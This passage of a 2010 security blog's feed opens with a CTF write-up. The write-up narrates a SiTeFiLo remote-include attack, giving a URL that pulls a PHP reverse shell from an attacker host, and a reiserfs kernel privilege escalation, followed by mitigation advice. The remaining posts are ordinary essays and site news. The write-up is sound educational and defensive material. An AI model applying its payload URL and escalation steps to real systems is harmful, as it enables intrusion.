executables.&lt;/p&gt;
&lt;p&gt;Side rant: Really, Netwin? In this day and age, is it necessary to have
a compiled executable serve HTML content? What advantage does this
provide over scripting languages vs. the increased risks? And why, in
the name of all that is holy, would you not limit the executables in the
script directory to simply &amp;quot;webmail.exe&amp;quot; and nothing else? There's no
reason to allow the execution of anything else in this directory for any
reason.&lt;/p&gt;
&lt;p&gt;From a sysadmin's point of view, it's difficult to deal with this kind
of incompetence from developers, as you probably don't have time to pen
test every single detail of the applications you use. However,
attempting to tighten permissions in any directories that are web
accessible so that only administrators can access them, and more
importantly, write to them, would be advisable in this case. This would
have made an attack much more difficult, if not broken it all together.&lt;/p&gt;
&lt;p&gt;Finally, even though I didn't exploit any of the authenticated user
vulnerabilities, that doesn't mean that other people didn't or wouldn't.
If I had wanted to, I could have used the ftp mis-configuration to give
myself an account and compromised the server that way. Like on the
n00bfilter, software updates should be applied regularly so as to
mitigate the risk posed by these vulnerabilities.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="the-gh0st"&gt;
&lt;h2&gt;The Gh0st&lt;/h2&gt;
&lt;div class="section" id="id3"&gt;
&lt;h3&gt;How I Exploited It&lt;/h3&gt;
&lt;p&gt;While this took a little less time for me than the n00bfilter (as it
wasn't, thankfully, getting DoSd), it was definitely more challenging,
and arguably more frustrating. However, after a good 7-8 hours of work,
I prevailed in the end.&lt;/p&gt;
&lt;p&gt;At the beginning, I was stumped. An nmap scan revealed that only port 80
open, and a port scan pivoted through killthen00b reported similar
results. In addition, the HTTP headers reported that the site was
running IIS, and the ASP file extensions seemed to agree.&lt;/p&gt;
&lt;p&gt;Thanks to some directory enumeration, I was quickly able to determine
that the /1/, /Sites/, and /iissamples/ directories were available in
addition to the obvious /index/ directory. /1/ appeared to be the most
interesting, as it was a simple, seemingly abandoned web form. All
input, however, seemed to be sanitized correctly by all the forms (both
in the index and in /1/). After the first hour, the only slightly
interesting thing I had found was some obfuscated javascript (which was
really fun to trace) that added a taunting image to certain pages when
viewed.&lt;/p&gt;
&lt;p&gt;Finally though, I made some progress. I had been focusing on the /1/ for
some time, as it looked promising as an avenue for attack. My first
break came from using more google-fu on one of the POST variable names,
which brought up links to &lt;a class="reference external" href="http://www.mariovaldez.net/software/sitefilo/"&gt;SiTeFiLo&lt;/a&gt; , a simple text file based
authentication mechanism. Oddly enough, the software was written in PHP,
but the login page claimed to be an ASP page. By this point, I was
starting to get curious what strange kind of setup this was, but I
decided that it was simply IIS with PHP installed. (Oh, how wrong I
was...). After my attempt to dump the slog_users.txt file yielded a
taunting &amp;quot;:P&amp;quot; in response, I decided to look for vulnerabilities in the
software. And sure enough, there was &lt;a class="reference external" href="http://osvdb.org/50711"&gt;a remote include vulnerability&lt;/a&gt;,
which allowed you to include a remote header.inc.php file. It was
finally time to get a shell!&lt;/p&gt;
&lt;p&gt;My first attempt, I am ashamed to admit, was to inject a metasploit
generated ASP file to get a remote meterpreter shell on the machine. As
smtx pointed out, I probably should have just done OS detection with
nmap and I would have known better. However, after getting banned for 5
minutes by the n00bfilter for doing that exact thing (albeit, at a
rather high speed setting), I decided to hold off on that the rest of
the competition. After all, it said it was IIS, right? :P&lt;/p&gt;
&lt;p&gt;After a few failed attempts, with no clear reason why they failed, I
decided to go with the simpler and less functional, but
almost-guaranteed-to-work, PHP shell. Using the php/reverse_php module,
I generated my header.inc.php file, and upped it into the previously
compromised web server on killthen00b . Then, it was just a matter of
firing up my multi/handler and browsing to:
|
&lt;a class="reference external" href="http://192.168.6.66/1/slogin_lib.inc.php?slogin_path=http://192.168.6.71/"&gt;http://192.168.6.66/1/slogin_lib.inc.php?slogin_path=http://192.168.6.71/&lt;/a&gt;
|  Sure enough, I now had a shell. A linux shell...:P&lt;/p&gt;
&lt;p&gt;That, I have to say, was a pleasant surprise. I checked my &amp;quot;id&amp;quot; and
found I was running as a member of the limited &amp;quot;www-data&amp;quot; account. So of
course, now it was time to get a privilege escalation attack to get me
my root shell.&lt;/p&gt;
&lt;p&gt;The first I looked at was one involving a &lt;a class="reference external" href="http://www.h-online.com/open/news/item/Hole-in-the-Linux-kernel-allows-root-access-850016.html"&gt;NULL pointer dereference&lt;/a&gt;,
but Ubuntu (which this was, at least according to uname) by default has
a mmap_min_addr of 65536. /proc/sys/vm/mmap_min_addr confirmed my
suspicions, that exploit was out.&lt;/p&gt;
&lt;p&gt;The next I considered was one from Tavis Ormandy involving a &lt;a class="reference external" href="http://seclists.org/fulldisclosure/2010/Jan/251"&gt;reference
after free bug in fasync file descriptors&lt;/a&gt; that allowed for privilege
escalation. As far as I could tell without testing, the system seemed to
be vulnerable. I modified his PoC slightly, opening up &amp;quot;/bin/sh&amp;quot; instead
of &amp;quot;/bin/true&amp;quot; on success, compiled, and tried it out. No joy.&lt;/p&gt;
&lt;p&gt;After a couple more failed modifications of the code, I decided to see
if there were any other promising exploits. And it was good that I did,
because my next one was the big one: a bug, discovered by Jon Oberheide,
in the linux kernel's handling of &lt;a class="reference external" href="http://jon.oberheide.org/blog/2010/04/10/reiserfs-reiserfs_priv-vulnerability/"&gt;reiserfs's extended attributes&lt;/a&gt;.
Exploiting this bug on a vulnerable install allows an unprivileged
attacker to setuid and setgid of arbitrary executables to root. To do
this, the attack exploits the fact that the kernel does not properly
restrict access to the &amp;quot;.reiserfs_priv/xattrs&amp;quot; located in the root of
all reiserfs filesystems mounted with the option user_xattrs. And, as
luck would have it, the filesystem we had write access to (/apachelogs/)
is actually a mounted reiserfs partition with this option. Root shell
time...&lt;/p&gt;
&lt;p&gt;Now, after I found this, it still took me a couple of hours to coax the
thing into working. I got the easy modifications out of the way pretty
quickly, like sending a compiled executable with the exploit rather than
compiling one on the system (there was no gcc), and changing all the
/.reiserfs_priv/xattrs paths to /apachelogs/.reiserfs_priv/xattrs.
However, I had some real issues getting the thing mounted. Even though
it had user mode enabled, sometimes I could not for the life of me get
the thing to mount, as mount repeatedly informed me that I needed root
permissions. Not sure if this was someone with root messing with the
competition, or just my own tiredness and incompetence coming out, but
it was frustrating. I also had to deal with people deleting my files,
which I eventually (mostly) solved by hiding in a hidden folder. After a
good 4-5 resets, the stars finally aligned and I got my code working:
game over. I found the key, dumped it, and submitted it.&lt;/p&gt;
&lt;p&gt;UPDATE 05/12/10: smtx, a much better hacker than I, posted a video
documenting his solution. It's quite nice, give it a watch.&lt;/p&gt;
&lt;p&gt;&lt;object width="400" height="300"&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=11680637&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;p&gt;&lt;a class="reference external" href="http://vimeo.com/11680637"&gt;gh0stbusters - how strong is your FU 2k10&lt;/a&gt; from &lt;a class="reference external" href="http://vimeo.com/user2322198"&gt;smtx&lt;/a&gt; on &lt;a class="reference external" href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id4"&gt;
&lt;h3&gt;How To Mitigate The Risk&lt;/h3&gt;
&lt;p&gt;The theoretical system admins of this box did a very good job at
minimizing the number of attack vectors, as well as at throwing out tons
of red herrings for unskilled attackers to find and waste their time on.
They also had permissions for www-data pretty tightly controlled on the
box, which made the attack even more difficult. However, their apparent
attention to detail in their initial configuration seems to have not
carried over into day-to-day maintenance.&lt;/p&gt;
&lt;p&gt;The attack could have easily been limited to a www-data shell, which,
unless a new zero-day privilege escalation exploit came out, wouldn't be
incredibly useful. However, their kernel was out of date (Ubuntu has
long since pushed kernel updates solving this issue), making it possible
to get root. Updates, though they should probably be tested first on a
non-production server, should be installed as soon as possible after
their release.&lt;/p&gt;
&lt;p&gt;The SiTeFiLo exploit would have been harder to prevent against with
updates, as there are no updates yet fixing the bug. However, one could
prevent this attack by removing the slogin_path variable (it's not
necessary if everything is in the same directory), turning off
register_globals (which would break the script without heavy editing)
or, best of all, by using Apache's htaccess authentication for
authenticating users rather than SiTeFiLo. SiTeFiLo's own author
recommends this if at all possible, so this is probably what you'd want
to do to fix this issue.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The challenge, overall, was both a great learning experience and tons of
fun. I really appreciated the chance to do some pen testing. As I
unfortunately have yet to land a job doing these things yet, it's not
everyday I get to break into someone else's boxes.&lt;/p&gt;
&lt;p&gt;The lessons for system administrators from this contest should be: be
very careful with user permissions (only give them out when you HAVE
to), and update your software as often as possible. These two rules
would have prevented all three compromises (and would have made the
challenge a living hell...:P).&lt;/p&gt;
&lt;p&gt;For pen testers, the lessons should be: try to identify and know the
targeted software as thoroughly as possible (you can't attack what you
don't understand), patience is a virtue, go where other people normally
wouldn't, and as always, when things get tough, try harder (TM).&lt;/p&gt;
&lt;p&gt;Now if you'll excuse me, I'm on the highway in the middle of Kansas
right now, and I'm pretty sure I'm about to get sucked into a tornado.
Hopefully I'll survive to post more about the craziness of the last 4
days...&lt;/p&gt;
&lt;/div&gt;
</summary><category term="fu"></category><category term="hacking"></category><category term="offensive security"></category><category term="Pen Testing"></category></entry><entry><title>Facebook, I Loved You. And You Blew It.</title><link href="https://spareclockcycles.org/2010/05/06/facebook-i-loved-you-and-you-blew-it.html" rel="alternate"></link><updated>2010-05-06T16:43:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-05-06:2010/05/06/facebook-i-loved-you-and-you-blew-it.html</id><summary type="html">&lt;p&gt;I can't do it anymore. I wish I could, but this just isn't working out,
Facebook. The lies, the viruses, the two-timing with advertisers, I just
can't handle it all. I don't have the time or the energy to deal with
all of your deceptions and all of your constant attacks on my privacy. I
need my personal space. I think I want to try other social networking
sites, and I think it's best that I leave you alone with your soul
mates: the advertisers, the identity thieves, the stalkers, and the
spies. It will be better this way.&lt;/p&gt;
&lt;p&gt;Sure, we had some great times in the beginning. How could I forget the
first time I got invited to join you? I was a high schooler then, and it
was a simpler world. You were simpler too. I mean, you were only for
students. Just to get an account you had to be invited and have a school
email address. I loved that about you. And anything I put on that
account, I knew that only my friends could access that data. I loved
that about you too. You were open and honest about what you did with my
data, and who got to see it. No &lt;a class="reference external" href="http://www.pcworld.com/article/195448/facebooks_privacy_controls_broken.html"&gt;convoluted and mostly broken privacy
controls&lt;/a&gt;, no &lt;a class="reference external" href="http://www.facebook.com/policy.php"&gt;&amp;quot;strongly encouraged&amp;quot; sharing of information&lt;/a&gt;, no
&lt;a class="reference external" href="http://www.readwriteweb.com/archives/how_to_delete_facebook_applications_and_why_you_should.php"&gt;applications intentionally trying to subvert privacy rules&lt;/a&gt;. You were
absolutely amazing, and I loved the simplicity of it all. Life was good.&lt;/p&gt;
&lt;p&gt;But then you started changing. Little things at first. You &lt;a class="reference external" href="http://www.facebook.com/r.php"&gt;let anyone
sign up on you&lt;/a&gt;, exposing me to viruses, stalkers, and a wide range of
other abuses. You redesigned yourself &lt;a class="reference external" href="http://techcrunch.com/2009/03/19/facebook-polls-users-on-redesign-94-hate-it/"&gt;again&lt;/a&gt; and
&lt;a class="reference external" href="http://techcrunch.com/2010/01/04/facebook-rolling-out-redesign-to-some-users/"&gt;again&lt;/a&gt;,
as if you weren't sure who you wanted to be. And I could never
understand that. I understand that change doesn't have to be bad, but I
always thought you were perfect exactly the way you were the first time
I logged in. I should have seen it coming then, but I was still too
naive and in love with you to care. I didn't realize that it symptomatic
of something deeper inside of you. Something tearing you apart. A secret
passion for someone other than me, your user. Yes, I speak of your
sordid affair with the advertisers.&lt;/p&gt;
&lt;p&gt;I understood when I got into this that you needed things for our
relationship to work. You needed to make money. And advertising was the
only feasible way to do that. But did you really, really need to jump
into bed with the sleaziest advertisers you could find, without a second
thought, and do all kinds of unspeakable things to my personal data? I'm
not going to lie, it hurt. A lot. I felt so betrayed. The signs of your
betrayal &lt;a class="reference external" href="http://www.allfacebook.com/2009/06/facebookpage-event-ads/"&gt;were everywhere&lt;/a&gt;. I tried hard to ignore them, push them
away, and to deal with your ever-increasing mistreatment of my personal
data. I thought, &amp;quot;Surely, this will be the last time you betray me
Facebook. Surely, you realize what we have is something special, and you
won't betray my trust again.&amp;quot; And I kept telling myself that, every
single time you did something stupid, like &lt;a class="reference external" href="http://www.readwriteweb.com/archives/facebooks_zuckerberg_says_the_age_of_privacy_is_ov.php"&gt;claim privacy was dead&lt;/a&gt;, or
reset everyone's privacy settings to &lt;a class="reference external" href="http://www.wired.com/epicenter/2009/12/facebook-privacy-update/"&gt;share everything&lt;/a&gt;, or let &lt;a class="reference external" href="http://www.pcworld.com/businesscenter/article/194701/facebook_wants_the_webs_default_to_be_social.html"&gt;random
applications access all your personal data&lt;/a&gt;. But I just can't keep
doing this.&lt;/p&gt;
&lt;p&gt;In the last week, three more big things happened, three things you did
that finally drove me over the edge. First was the advent of
applications that &lt;a class="reference external" href="http://www.pcworld.com/article/195710/new_facebook_social_features_secretly_add_apps_to_your_profile_updated.html"&gt;can silently install themselves&lt;/a&gt;, with no user
approval, giving them access to personal data. There's absolutely no
reason, ever, that an application that I didn't explicitly approve
should be allowed to access my information. Are you trying to do the
identity thieves' jobs for them? Second, you took away my about me /
interests page and tried to force me, in place of that, to &lt;a class="reference external" href="http://www.networkworld.com/news/2010/050610-facebook-privacy-violations.html"&gt;make all of
my interests public&lt;/a&gt; by making them &amp;quot;fan pages&amp;quot;. Because of your broken
privacy controls, there was, up until a couple days ago, no way to hide
those pages from everyone in the world, and there's still no way, to my
knowledge, to actually prevent people who are also &amp;quot;fans&amp;quot; of the same
pages from seeing your preferences. Build a bot that is a fan of
everything, and it completely defeats the system. Why would you do this,
Facebook? Why would you sacrifice a great, working system, and make it
terrible and invasive? It's clear that you only do things anymore
because your advertisers want it, not because you want to make me, your
user, have a good experience and connect with my friends. Finally,
there's &lt;a class="reference external" href="http://eu.techcrunch.com/2010/05/05/video-major-facebook-security-hole-lets-you-view-your-friends-live-chats/"&gt;this exploit&lt;/a&gt;, which allows people to spy on others'
conversations using only their browser and Facebook's own privacy
settings tool. That's just pathetic, coming from an organization that I
trusted with so much of my life's information.&lt;/p&gt;
&lt;p&gt;So that's it. I wish so badly things didn't have to end this way,
Facebook, but we're going to have to go our separate ways. We'll still
see each other from time to time of course, but it's never going to be
the same. I just can't, in good conscience, keep being your user. I'd
say that I'm sorry, but I'm not. This really is your fault, and there's
nothing you can do now to fix it. The time for that has passed. It was a
great ride, and I thank you for the good times, but now I'm going to
have to get off and advise everyone I know to do the same. &lt;a class="reference external" href="http://www.youtube.com/watch?v=TdRuc0yHImE"&gt;Goodbye
Facebook&lt;/a&gt;.&lt;/p&gt;
</summary><category term="dearjohn"></category><category term="facebook"></category><category term="goodbye"></category><category term="privacy"></category></entry><entry><title>Why Chinese Hackers Aren't A Threat</title><link href="https://spareclockcycles.org/2010/05/03/why-chinese-hackers-arent-a-threat.html" rel="alternate"></link><updated>2010-05-03T10:48:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-05-03:2010/05/03/why-chinese-hackers-arent-a-threat.html</id><summary type="html">&lt;p&gt;I've had enough. And no, I'm not talking coffee. No such thing as enough
coffee. No, rather, I've had enough of people claiming that the sky is
falling, when it clearly isn't (and making a few bucks off the fear
while they're at it). I've had enough of Die Hard 4 &amp;quot;&lt;a class="reference external" href="http://www.urbandictionary.com/define.php?term=fire+sale"&gt;fire sale&lt;/a&gt;&amp;quot;
scenarios, enough of &lt;a class="reference external" href="http://www.wired.com/threatlevel/2010/04/cyberwar-richard-clarke/"&gt;Richard Clarke's &amp;quot;digital equivalent of
thermonuclear war&amp;quot; fear-mongering&lt;/a&gt;, enough of &lt;a class="reference external" href="http://www.businessweek.com/idg/2010-04-07/is-the-u-s-the-nation-most-vulnerable-to-cyberattack-.html"&gt;hyperbolic news articles
calling for the restructuring of the Internet&lt;/a&gt; to save humanity itself,
and more than enough of random members of the U.S. Congress claiming
they &lt;a class="reference external" href="http://www.wired.com/threatlevel/2010/04/cyberwar-commander/"&gt;understand the threat and that it is a real one&lt;/a&gt;, when they can
barely use the Internet themselves. Please, &lt;strong&gt;just stop it&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Now first, let me be clear: I do not argue that Chinese crackers do not
have the skill to successfully attack American infrastructure (and most
certainly this site...I know you can do it, please don't). On the
contrary, I think the &lt;a class="reference external" href="http://www.automationworld.com/news-957"&gt;large&lt;/a&gt; &lt;a class="reference external" href="http://www.infosecwriters.com/text_resources/pdf/SCADA.pdf"&gt;body&lt;/a&gt; of &lt;a class="reference external" href="http://www.truststc.org/pubs/693.html"&gt;research&lt;/a&gt; shows that these
attacks are not only feasible, but well within the reach of these
government backed attackers. I also do not contend that they pose no
threat, just not the kind of catastrophic one being shouted about from
the rooftops nowadays. What I do argue is this: a.) there is no clear
motivation for any such attack and b.) if they wished to commit these
kinds of attacks, they would have done it by now.&lt;/p&gt;
&lt;p&gt;&amp;quot;Now, hold on a second,&amp;quot; an objector might say. &amp;quot;These damn commies
clearly hate us for our freedom/liberty/excellent television
programming/fried foods. They don't need more reason than that to attack
us!&amp;quot; It's exactly this kind of Cold War mentality that is preventing
people from understanding the true nature of China's goals in
cyberspace. It's not about &amp;quot;spreading communism&amp;quot; or &amp;quot;fighting the
capitalist pigs&amp;quot;. It's purely about profit.&lt;/p&gt;
&lt;p&gt;Don't believe me? Let's look at two major attacks we've seen so far from
the Chinese. The most recent attack (&lt;a class="reference external" href="http://en.wikipedia.org/wiki/Operation_Aurora"&gt;Aurora&lt;/a&gt;), the one that has
renewed calls for greater network security (and of course, monitoring)
amongst government types across the country, was targeted almost
exclusively at commercial organizations. This would seem odd, if one
thought that the Chinese were trying to &amp;quot;destroy the capitalist system&amp;quot;.
If these attackers were easily able to break into literally dozens of
high-profile, hardened, target networks, what was stopping them from
breaking into, say, our power grid? The phone system? Wall Street? It'd
certainly be a more effective way to bring down the system. The answer:
absolutely nothing was stopping them. But this is nothing to fear,
because they obviously didn't and still don't want to. They chose their
targets for specific reasons, and causing the downfall of the United
States wasn't one of them.&lt;/p&gt;
&lt;p&gt;So what do they want? Well, one just needs to look at what was taken.
Proprietary code. Proprietary designs. Intellectual property. If you
look at &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Titan_Rain"&gt;Titan Rain&lt;/a&gt; back in 2003, the story was the same. It was all
about taking valuable information, and nothing else. Save a few web
defacements, none of the Chinese attacks we have seen have focused on
anything but stealing proprietary data. While almost all of these
Chinese attackers are indeed strongly nationalistic, their goal is not
to destroy the U.S., but to enrich China.&lt;/p&gt;
&lt;p&gt;There is an excellent quote from &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Mark_Getty"&gt;Mark Getty&lt;/a&gt; that states that
&amp;quot;intellectual property is the oil of the 21st century.&amp;quot; &lt;a class="reference external" href="http://www.iipa.com/pdf/IIPA%2520NBCU%2520Study%2520Press%2520Release%2520FINAL%252011072005.pdf"&gt;By some
estimates&lt;/a&gt;, intellectual property makes up about 20% of the U.S. GDP
(and 60% of yearly growth), and I personally think that is a
conservative estimate. That comes out to be a $2.92 trillion industry.
By comparison, the U.S. annually spends &lt;a class="reference external" href="http://tonto.eia.doe.gov/energyexplained/index.cfm?page=oil_home#tab2"&gt;only $670 billion on oil each
year&lt;/a&gt;. Intellectual property includes every copyright, patent, trade
secret, etc, that anyone is currently using to make money off of. That's
a pretty big chunk of the economy, I would say. By breaking into U.S.
networks and taking this data for themselves, China is, quite literally,
stealing billions of dollars worth of intellectual property during their
intrusions into our corporate networks. It's like getting billions in
free research and development, all for the cost of a single 0-day in
Internet Explorer. Not bad, huh?&lt;/p&gt;
&lt;p&gt;So why don't they take this intellectual property while at the same time
crashing our economy and destroying the country? I mean, what's bad for
us is good for them, right? Wrong. People often fail to understand how
interconnected today's modern economy is, even after such illuminating
events as the recent financial crisis. This is especially true in
China's case: their economic well-being is still &lt;strong&gt;very&lt;/strong&gt; dependent on
the well-being of the United States. There is a saying amongst loan
sharks (or so Hollywood has told me) that &amp;quot;dead men don't pay debts.&amp;quot; We
are currently in debt to China for &lt;a class="reference external" href="http://en.wikipedia.org/wiki/United_States_public_debt#Foreign_ownership"&gt;over $888.5 billion&lt;/a&gt;. Crashing our
economy, making us economic &amp;quot;dead men&amp;quot;, would make us unable to repay
that money, let alone with interest, which in turn would cause their own
economy to collapse. Rather than jeopardize their own economic
well-being, China would much rather sit back and watch the U.S. struggle
to develop new technology with these loans while they collect their
money with interest, while at the same time stealing the final product
of the research that the money is being used to fund. Let me see if I
can summarize this in more interweb-friendly terms:&lt;/p&gt;
&lt;div class="line-block"&gt;
&lt;div class="line"&gt;1.) China loans U.S. large sums of money.&lt;/div&gt;
&lt;div class="line"&gt;2.) U.S. uses said money to create new intellectual property.&lt;/div&gt;
&lt;div class="line"&gt;3.) China breaks into networks and takes said property, then also forces U.S. to pay back their debt with interest.&lt;/div&gt;
&lt;div class="line"&gt;4.) ????&lt;/div&gt;
&lt;div class="line"&gt;5.) PROFIT&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;I think from that summary that it is pretty clear why China is attacking
our networks in the way that it is, and why we have not yet seen the
kind of all-out digital warfare that pundits have been warning about
nearly constantly for the past decade. There's no PROFIT at the end of
the meme if they do anything else.&lt;/p&gt;
&lt;p&gt;So does this mean that we shouldn't invest in protecting critical
infrastructure and the like? No, of course not. There will always be a
few people who just want to watch things burn, and we need to protect
against that. However, we should be responding in a much more mature,
measured, and rational way, rather than running around acting &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Doomsday_Clock"&gt;like it's
5 seconds to midnight&lt;/a&gt;. Encourage young people to enter the information
assurance field through scholarships and higher pay for these workers,
improve IDS/firewall/antivirus systems, hold corporate software makers
accountable for their software vulnerabilities, and start public
education campaigns to inform people enough so that maybe, just maybe,
they won't click on everything that pops up in front of them. Babbling
incoherently about communist threats and imminent cyber war does nothing
to solve the problem, and will likely cause our limited security
research funds to be invested in all the wrong places. So I ask again:
please, just stop it.&lt;/p&gt;
</summary><category term="chinese"></category><category term="crackers"></category><category term="critical infrastructure"></category><category term="fire sale"></category><category term="FUD"></category><category term="hackers"></category></entry><entry><title>Transmission Complete.</title><link href="https://spareclockcycles.org/2010/04/27/transmission-complete.html" rel="alternate"></link><updated>2010-04-27T03:13:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-27:2010/04/27/transmission-complete.html</id><summary type="html">&lt;p&gt;If you're reading this, the site move should now be complete. In
addition to the move, I've also taken the opportunity to upgrade to a
newer, more flexible theme, which I will be working on in the next few
weeks. To help offset the costs for hosting and DNS registrations, I
also decided to introduce some ads. Hopefully they will not be too
obtrusive, and if they are, well, donate some money so I can get by
without them :P . I still have some tweaks that I will be making to the
site over the next couple weeks, so please bear with me if anything
breaks (and please let me know if it does: supernothing AT wordpress DOT
org.) Hopefully this site has some great days ahead of it, and I look
forward to making it into a great resource for those wishing to learn
and discuss any and all things related to information security,
programming, hacking, and technology.&lt;/p&gt;
&lt;p&gt;Also: Thanks again to &lt;a class="reference external" href="http://duststorm.org"&gt;duststorm&lt;/a&gt; for all his help and generosity with
the hosting!&lt;/p&gt;
</summary><category term="ads"></category><category term="beginnings"></category><category term="Site News"></category></entry><entry><title>Moving Day Is Here!</title><link href="https://spareclockcycles.org/2010/04/26/moving-day-is-here.html" rel="alternate"></link><updated>2010-04-26T13:23:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-26:2010/04/26/moving-day-is-here.html</id><summary type="html">&lt;p&gt;Well, the day is here! I am officially moving my blog off of
wordpress.com hosting onto &lt;a class="reference external" href="http://duststorm.org"&gt;duststorm's VPS&lt;/a&gt;. You will still be able to
access it at spareclockcycles.wordpress.com, but the main site will be
&lt;a class="reference external" href="https://spareclockcycles.org"&gt;spareclockcycles.org&lt;/a&gt;, so update your bookmarks accordingly. There
will be a lot of messing around with DNS and the like going on over the
next few hours, so I apologize for any downtime. I will put up a post
when the move is complete.&lt;/p&gt;
</summary><category term="dns"></category><category term="duststorm"></category><category term="moving"></category><category term="vps"></category></entry><entry><title>Updated Reverse DNS Tool</title><link href="https://spareclockcycles.org/2010/04/25/updated-reverse-dns-tool.html" rel="alternate"></link><updated>2010-04-25T14:33:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-25:2010/04/25/updated-reverse-dns-tool.html</id><summary type="html">&lt;p&gt;A few posts ago I &lt;a class="reference external" href="http://spareclockcycles.wordpress.com/2010/04/13/reverse-dns-lookups-with-dnspython/"&gt;released some rather simplistic code to do reverse
DNS lookups&lt;/a&gt;. While useful, many improvements could obviously be made.
The lookup speeds were pretty dismal (15-25 lookups a second), stemming
from my poor handling of timeouts and the fact that I had lazily ignored
multithreading because I wanted to get something working fast. In
addition, the code was just a giant blob thrown together into a Python
file, which probably made a few peoples' eyes bleed.&lt;/p&gt;
&lt;p&gt;Because of these issues, I took the time today to rework the code so
that everything is *much* cleaner now (everything broken nicely into
classes and such), and is, in addition, fully multithreaded. To do the
threading, I adapted a basic thread pooling class shamelessly taken off
&lt;a class="reference external" href="http://code.activestate.com/recipes/203871-a-generic-programming-thread-pool/"&gt;the interwebs&lt;/a&gt; to use Python generators for speed and RAM
considerations, and to allow for thread callbacks to be synchronized. As
a result, with 35 threads in the thread pool, I am now getting about
400-600 DNS lookups / second. Not bad for 45 minutes of work :P . You
can grab the new code &lt;a class="reference external" href="https://spareclockcycles.org/downloads/code/revdns.tar.gz"&gt;here&lt;/a&gt;.&lt;/p&gt;
</summary><category term="dns"></category><category term="dnspython"></category><category term="hacking"></category><category term="Pen Testing"></category><category term="reverse dns"></category></entry><entry><title>Moving Time!</title><link href="https://spareclockcycles.org/2010/04/24/moving-time.html" rel="alternate"></link><updated>2010-04-24T16:44:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-24:2010/04/24/moving-time.html</id><summary type="html">&lt;p&gt;Just got done registering my shiny new domain name (only $4 at
&lt;a class="reference external" href="http://netfirms.com"&gt;netfirms.com&lt;/a&gt; with the coupon code DOLLARDOMAIN for those interested),
so from now on you can all access my blog at &lt;a class="reference external" href="http://spareclockcycles.com"&gt;http://spareclockcycles.com&lt;/a&gt;
. You can also now contact me directly at supernothing AT
spareclockcycles D0T com .&lt;/p&gt;
&lt;p&gt;In addition, thanks to the generosity of my good friend &lt;a class="reference external" href="http://duststorm.org"&gt;duststorm&lt;/a&gt;, I
will be moving this blog off of &lt;a class="reference external" href="http://wordpress.com/"&gt;wordpress.com&lt;/a&gt; hosting onto his
dedicated &lt;a class="reference external" href="http://en.wikipedia.org/wiki/Virtual_private_server"&gt;VPS&lt;/a&gt;. I decided to do this for a number of reasons, most of
them related to the limitations of wordpress.com blogs. Hopefully, this
will allow me to add a significant amount of functionality to the blog
(like being able to host source files locally -_-), as well as possibly
expanding the site beyond blogging into a general forum for discussions
on security and the like. I should be completing the move sometime in
the next week, so I'll keep everyone posted.&lt;/p&gt;
&lt;div class="zemanta-pixie" style="margin-top:10px;height:15px;"&gt;&lt;p&gt;&lt;a class="reference external" href="http://reblog.zemanta.com/zemified/c1a9c15a-d6f9-442e-8b47-d491af752931/"&gt;&lt;img alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=c1a9c15a-d6f9-442e-8b47-d491af752931" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;</summary><category term="dns"></category><category term="domain name"></category><category term="hosting"></category><category term="Site News"></category></entry><entry><title>Linux Credit Card!</title><link href="https://spareclockcycles.org/2010/04/21/linux-credit-card.html" rel="alternate"></link><updated>2010-04-21T13:29:00-04:00</updated><author><name>admin</name></author><id>tag:spareclockcycles.org,2010-04-21:2010/04/21/linux-credit-card.html</id><summary type="html">&lt;p&gt;It's exam time, so I probably won't be posting much in the next week or
two, but I wanted to share something a friend just sent me. &lt;a class="reference external" href="http://www.linuxfoundation.org/"&gt;The Linux
Foundation&lt;/a&gt; has now partnered with &lt;a class="reference external" href="http://www.corporate.visa.com"&gt;Visa&lt;/a&gt; to offer a &lt;a class="reference external" href="http://www.linuxfoundation.org/programs/linux-credit-card"&gt;Linux credit
card&lt;/a&gt;. For every card activation, the Linux Foundation will receive a
$50 donation, and gets a small percentage of every purchase you make as
well. So if you're looking for a new credit card, and you want to
support the Linux devs in making Linux even better, you might keep this
one in mind.&lt;/p&gt;
&lt;p&gt;SIDE NOTE: I totally almost called this article &amp;quot;Tux Bux&amp;quot;, but I think
we can all agree that not doing that was for the best.&lt;/p&gt;
&lt;div class="zemanta-pixie" style="margin-top:10px;height:15px;"&gt;&lt;p&gt;&lt;a class="reference external" href="http://reblog.zemanta.com/zemified/b6ef7a85-0a7c-4572-8f86-23080cec029c/"&gt;&lt;img alt="Reblog this post [with Zemanta]" src="http://img.zemanta.com/reblog_e.png?x-id=b6ef7a85-0a7c-4572-8f86-23080cec029c" /&gt;&lt;/a&gt;&lt;/p&gt;
